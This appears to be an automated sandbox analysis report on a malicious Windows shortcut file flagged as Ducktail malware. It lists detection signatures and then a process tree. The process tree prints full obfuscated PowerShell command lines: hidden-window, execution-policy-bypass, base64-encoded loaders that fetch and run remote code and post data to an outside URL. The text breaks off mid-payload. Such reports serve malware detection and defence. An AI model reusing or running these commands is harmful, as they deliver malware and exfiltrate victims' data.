Edit tour
Windows
Analysis Report
gW6FHWNFzR.lnk
Overview
General Information
Detection
Ducktail
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64native
- cmd.exe (PID: 1868 cmdline:
"C:\Window s\system32 \cmd.exe" /v /k "Sta RT /Mi^n " " PoW^ERSh El^L -W H^ ID^De^N -n ^o^L^o^GO -N^oP -Ep bYPass -E^ n^C^ode^DC o^mMa^N^d "SQBFAFgAI AAoAFsAVAB FAHgAVAAuA EUATgBjAE8 AZABpAG4AR wBdADoAOgB VAFQARgA4A C4ARwBFAFQ AUwBUAFIAS QBOAGcAKAA oAGkAVwByA CAAKABbAFM AeQBzAHQAZ QBtAC4AVAB lAHgAdAAuA EUAbgBjAG8 AZABpAG4AZ wBdADoAOgB VAFQARgA4A C4ARwBlAHQ AUwB0AHIAa QBuAGcAKAB bAEMAbwBuA HYAZQByAHQ AXQA6ADoAR gByAG8AbQB CAGEAcwBlA DYANABTAHQ AcgBpAG4AZ wAoACIAYQB IAFIAMABjA EgATQA2AEw AeQA5ADEAZ QBYAFEAeAB iAGoAaABrA FoAVwBRADU AWgBtAEkAe gBPAEQAQQB 1AFkAMgA5A HQATAAyAGw AcQAiACkAK QApACkALgB DAE8AbgB0A GUAbgB0ACk AKQA="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 3340 cmdline:
PoWERShElL -W HIDDeN -noLoGO - NoP -Ep bY Pass -EnCo deDComMaNd "SQBFAFgA IAAoAFsAVA BFAHgAVAAu AEUATgBjAE 8AZABpAG4A RwBdADoAOg BVAFQARgA4 AC4ARwBFAF QAUwBUAFIA SQBOAGcAKA AoAGkAVwBy ACAAKABbAF MAeQBzAHQA ZQBtAC4AVA BlAHgAdAAu AEUAbgBjAG 8AZABpAG4A ZwBdADoAOg BVAFQARgA4 AC4ARwBlAH QAUwB0AHIA aQBuAGcAKA BbAEMAbwBu AHYAZQByAH QAXQA6ADoA RgByAG8AbQ BCAGEAcwBl ADYANABTAH QAcgBpAG4A ZwAoACIAYQ BIAFIAMABj AEgATQA2AE wAeQA5ADEA ZQBYAFEAeA BiAGoAaABr AFoAVwBRAD UAWgBtAEkA egBPAEQAQQ B1AFkAMgA5 AHQATAAyAG wAcQAiACkA KQApACkALg BDAE8AbgB0 AGUAbgB0AC kAKQA=" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - csc.exe (PID: 8228 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\p0kqoc iu\p0kqoci u.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 8248 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESAEBA.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\p0k qociu\CSCE 1A7387FE7C 64A8A9613A 1F038E9129 0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 8464 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Version 5 .1 -s -NoL ogo -NoPro file MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - WINWORD.EXE (PID: 8852 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /n "C:\U sers\user\ AppData\Lo cal\Temp\A bout-Us.do cx.docx" / o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6) - cmd.exe (PID: 8704 cmdline:
"C:\Window s\system32 \cmd.exe" /c start / min "" pow ershell.ex e -WindowS tyle hidde n -NoLogo -NoProfile -Executio nPolicy by pass -Enco dedCommand JAB1AHIAa QAgAD0AIAA iAGgAdAB0A HAAcwA6AC8 ALwB1AHkAd AAxAG4AOAB kAGUAZAA5A GYAYgAzADg AMAAuAGMAb wBtAC8AZgB pAGwAZQAyA C8AYQA5ADM AMQA1ADIAO ABjADIANgB lADEAYwA3A DgAZQA4ADc AYgBhAGYAY gBiAGYAYgB lADcAYwBkA DMAZAAyAGU AYgA2ADIAN QBlADYAOQA wADAAYwAzA DYAZgA3AGU ANABiADYAN AA3AGUAZAB mADYAOQAwA DcANwAwADI AZAA2AGEAZ QAyAGYAZAA yADIAYQA0A GMAOQBkAGY AOQA1ADcAY QA4AGIAYQB hADkAMwBhA DMAYwAyAGE AMgA4AGMAM wAyAGMAYQA zADMAMAAwA DYAYgBhAGY ANQAzADkAN QAzADEAZgA 0ADEAZABhA DQAZQA3AGY AYgA0ADQAN AA0AGYAYQB kADMANQA0A DYAOABkAGI ANQA2AGEAM gBiADgANQB lADUANgA4A DAAMwAwADM AYwA4AGQAY QBiADUAZgA 4AGIANAA5A DIAMwA0ADA ANgBiAGUAM gBhADMAMgA xADYAYQBhA DcANAA4ADA AYQAzAGQAM gA3ADAAYwB kADgAOQBhA DkAOAA0ADY AMQAwAGQAN wA3AGUAZAB lADUAZgBkA DcAYwA3ADY AMQBmADIAM gBjAGQAMQA 3ADgAYwA3A CIAOwANAAo AJABjAG8Ad QBuAHQAIAA 9ACAAMQAwA DAAOwANAAo ADQAKAA0AC gANAAoAZgB 1AG4AYwB0A GkAbwBuACA AUwBlAG4AZ AAgAHsADQA KACAAIAAgA CAAcABhAHI AYQBtACgAI ABbAFAAUwB PAGIAagBlA GMAdABdACA AJABsAG8AZ wBNAHMAZwA gACkADQAKA A0ACgAgACA AIAAgACMAI ABDAG8AbgB 2AGUAcgB0A CAAYgBvAGQ AeQAgAHQAb wAgAHMAdAB yAGkAbgBnA A0ACgAgACA AIAAgACQAc wB0AHIAaQB uAGcAQgBvA GQAeQAgAD0 AIABbAHMAd AByAGkAbgB nAF0AKAAkA GwAbwBnAE0 AcwBnACAAf AAgAEMAbwB uAHYAZQByA HQAVABvAC0 ASgBzAG8Ab gApADsADQA KACAAIAAgA CAAJABsAG8 AZwBNAGUAc wBzAGEAZwB lAHMAIAA9A CAAQAAoACk AOwANAAoAI AAgACAAIAA kAGwAbwBnA E0AZQBzAHM AYQBnAGUAc wAgACsAPQA gACQAcwB0A HIAaQBuAGc AQgBvAGQAe QA7AA0ACgA gACAAIAAgA CQAbABvAGc ATQBlAHMAc wBhAGcAZQB zACAAKwA9A CAAIgAtAC0 ALQAtAC0AL QAtAC0ALQA tACIAOwANA AoADQAKACA AIAAgACAAJ ABoAGUAYQB kAGUAcgBzA CAAPQAgAEA AewB9ADsAD QAKACAAIAA gACAAJABrA GUAeQAgAD0 AIAAiAEMAb wBuAHQAZQB uAHQALQBUA HkAcABlACI AOwANAAoAI AAgACAAIAA kAHYAYQBsA HUAZQAgAD0 AIAAiAGEAc ABwAGwAaQB jAGEAdABpA G8AbgAvAGo AcwBvAG4AI gA7AA0ACgA NAAoAIAAgA CAAIAAkAGg AZQBhAGQAZ QByAHMAWwA kAGsAZQB5A F0AIAA9ACA AJAB2AGEAb AB1AGUAOwA NAAoAIAAgA CAAIAAkAHU AcgBpACAAP QAgACIATAB PAEcAVQBSA EwAIgA7AA0 ACgAgACAAI AAgAHQAcgB 5AA0ACgAgA CAAIAAgACA AIAAgACAAe wANAAoAIAA gACAAIAAgA CAAIAAgACA AIAAgACAAJ ABiAG8AZAB 5ACAAPQAgA CQAbABvAGc ATQBlAHMAc wBhAGcAZQB zACAAfAAgA EMAbwBuAHY AZQByAHQAV ABvAC0ASgB zAG8AbgA7A A0ACgAgACA AIAAgACAAI AAgACAAIAA gACAAIABJA G4AdgBvAGs AZQAtAFcAZ QBiAFIAZQB xAHUAZQBzA HQAIAAtAFU AcgBpACAAJ AB1AHIAaQA gAC0ATQBlA HQAaABvAGQ AIABQAG8Ac wB0ACAALQB IAGUAYQBkA GUAcgBzACA AJABoAGUAY QBkAGUAcgB zACAALQBCA G8AZAB5ACA AJABiAG8AZ AB5AA0ACgA gACAAIAAgA CAAIAAgACA AfQANAAoAI AAgACAAIAA gACAAIAAgA GMAYQB0AGM AaAB7AA0AC gAgACAAIAA gACAAIAAgA CAAIAAgACA AIAANAAoAI AAgACAAIAA gACAAIAAgA H0ADQAKACA